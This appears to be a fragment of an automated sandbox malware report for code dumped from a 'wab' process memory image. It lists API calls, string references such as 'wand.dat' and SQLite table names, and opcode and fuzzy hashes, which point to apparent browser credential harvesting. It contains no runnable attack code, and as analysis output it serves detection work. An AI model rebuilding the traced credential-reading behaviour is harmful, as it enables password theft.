                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$memcpy
                                                  • String ID:
                                                  • API String ID: 368790112-0
                                                  • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                  • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                  • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                  • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                    • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                    • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                    • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                    • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                  • GetMenu.USER32(?), ref: 00410F8D
                                                  • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                  • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                  • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                  • String ID:
                                                  • API String ID: 1889144086-0
                                                  • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                  • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                  • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                  • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                  • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                  • GetLastError.KERNEL32 ref: 0041810A
                                                  • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$CloseCreateErrorHandleLastMappingView
                                                  • String ID:
                                                  • API String ID: 1661045500-0
                                                  • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                  • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                  • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                  • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                  • memcpy.MSVCRT ref: 0042EC7A
                                                  Strings
                                                  • Cannot add a column to a view, xrefs: 0042EBE8
                                                  • sqlite_altertab_%s, xrefs: 0042EC4C
                                                  • virtual tables may not be altered, xrefs: 0042EBD2
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpymemset
                                                  • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                  • API String ID: 1297977491-2063813899
                                                  • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                  • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                  • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                  • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0040560C
                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                    • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                  • String ID: *.*$dat$wand.dat
                                                  • API String ID: 2618321458-1828844352
                                                  • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                  • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                  • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                  • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                  • wcslen.MSVCRT ref: 00410C74
                                                  • _wtoi.MSVCRT ref: 00410C80
                                                  • _wcsicmp.MSVCRT ref: 00410CCE
                                                  • _wcsicmp.MSVCRT ref: 00410CDF
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                  • String ID:
                                                  • API String ID: 1549203181-0
                                                  • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                  • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                  • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                  • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 00412057
                                                    • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                  • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                  • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                  • GetKeyState.USER32(00000010), ref: 0041210D
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                  • String ID:
                                                  • API String ID: 3550944819-0
                                                  • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                  • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                  • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                  • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • wcslen.MSVCRT ref: 0040A8E2
                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                    • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                    • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                  • memcpy.MSVCRT ref: 0040A94F
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@$memcpy$mallocwcslen
                                                  • String ID:
                                                  • API String ID: 3023356884-0
                                                  • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                  • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                  • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                  • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • wcslen.MSVCRT ref: 0040B1DE
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                    • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                    • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                  • memcpy.MSVCRT ref: 0040B248
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@$memcpy$mallocwcslen
                                                  • String ID:
                                                  • API String ID: 3023356884-0
                                                  • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                  • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                  • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                  • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: @
                                                  • API String ID: 3510742995-2766056989
                                                  • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                  • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                  • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                  • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@??3@memcpymemset
                                                  • String ID:
                                                  • API String ID: 1865533344-0
                                                  • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                  • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                  • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                  • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • strlen.MSVCRT ref: 0040B0D8
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                    • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                    • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                  • memcpy.MSVCRT ref: 0040B159
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@$memcpy$mallocstrlen
                                                  • String ID:
                                                  • API String ID: 1171893557-0
                                                  • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                  • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                  • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                  • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 004144E7
                                                    • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                    • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                  • memset.MSVCRT ref: 0041451A
                                                  • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                  • String ID:
                                                  • API String ID: 1127616056-0
                                                  • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                  • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                  • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                  • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$memset
                                                  • String ID: sqlite_master
                                                  • API String ID: 438689982-3163232059
                                                  • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                  • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                  • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                  • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                  • wcscpy.MSVCRT ref: 00414DF3
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: BrowseFolderFromListMallocPathwcscpy
                                                  • String ID:
                                                  • API String ID: 3917621476-0
                                                  • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                  • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                  • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                  • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                  • _snwprintf.MSVCRT ref: 00410FE1
                                                  • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                  • _snwprintf.MSVCRT ref: 0041100C
                                                  • wcscat.MSVCRT ref: 0041101F
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                  • String ID:
                                                  • API String ID: 822687973-0
                                                  • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                  • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                  • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                  • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                  • malloc.MSVCRT ref: 00417459
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74DEDF80,?,0041755F,?), ref: 00417478
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$??3@malloc
                                                  • String ID:
                                                  • API String ID: 4284152360-0
                                                  • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                  • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                  • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                  • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                  • RegisterClassW.USER32(?), ref: 00412428
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                  • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: HandleModule$ClassCreateRegisterWindow
                                                  • String ID:
                                                  • API String ID: 2678498856-0
                                                  • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                  • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                  • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                  • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetDlgItem.USER32(?,?), ref: 00409B40
                                                  • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                  • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                  • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Item
                                                  • String ID:
                                                  • API String ID: 3888421826-0
                                                  • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                  • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                  • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                  • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 00417B7B
                                                  • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                  • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                  • GetLastError.KERNEL32 ref: 00417BB5
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$ErrorLastLockUnlockmemset
                                                  • String ID:
                                                  • API String ID: 3727323765-0
                                                  • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                  • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                  • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                  • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                  • malloc.MSVCRT ref: 00417407
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$??3@malloc
                                                  • String ID:
                                                  • API String ID: 4284152360-0
                                                  • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                  • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                  • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                  • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0040F673
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                  • strlen.MSVCRT ref: 0040F6A2
                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                  • String ID:
                                                  • API String ID: 2754987064-0
                                                  • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                  • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                  • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                  • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0040F6E2
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                  • strlen.MSVCRT ref: 0040F70D
                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
